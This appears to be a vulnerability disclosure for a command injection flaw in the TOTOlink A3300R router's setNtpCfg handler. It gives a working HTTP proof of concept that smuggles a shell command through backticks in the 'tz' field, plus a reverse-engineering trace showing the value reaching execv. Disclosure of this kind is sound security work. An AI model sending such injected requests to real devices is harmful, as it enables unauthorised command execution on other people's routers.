Skip to content

Latest commit

 

History

History
68 lines (49 loc) · 2.94 KB

TOTOlink A3300R setNtpCfg.md

File metadata and controls

68 lines (49 loc) · 2.94 KB

TOTOlink A3300R V17.0.0cu.557_B20221024 Command Injection

Discoverer

Yangyi

Product Information

Device: TOTOlink A3300R Firmware Version: V17.0.0cu.557_B20221024 Manufacturer's website information:https://www.totolink.net/ Firmware download address :https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/241/ids/36.html

image-20240109124617070

Vulnerability Description

When deal with setNtpCfg request,tz parameter is vulnerable to OS command injection.

POC

POST /cgi-bin/cstecgi.cgi?token=F30C610BF2E2EC8B HTTP/1.1
Host: itotolink.net
Content-Length: 128
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://itotolink.net
Referer: http://itotolink.net/advance/time.html?token=F30C610BF2E2EC8B
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{"tz":"UTC+0`ls>/web/567.txt`","enable":"1","server":"www.baidu.com*cn.pool.ntp.org*europe.pool.ntp.org","topicurl":"setNtpCfg"}

injection the command "ls>/web/567.txt"

image-20240109132417822

check the result.

GET /567.txt HTTP/1.1
Host: itotolink.net
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://itotolink.net/advance/time.html?token=F30C610BF2E2EC8B
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

image-20240109132422923

Analysis

sub_410470 will handle the setNtpCfg request. sub_410470 get tz parameter from request body, then pass to Uci_Set_Str function.

image-20240109132650900

Uci_Set_Str function Splicing uci command, and pass to CsteSystem function.

image-20240109131204077

CsteSystem wraps the command and then passes it to execv to execute the command.

image-20240109131330610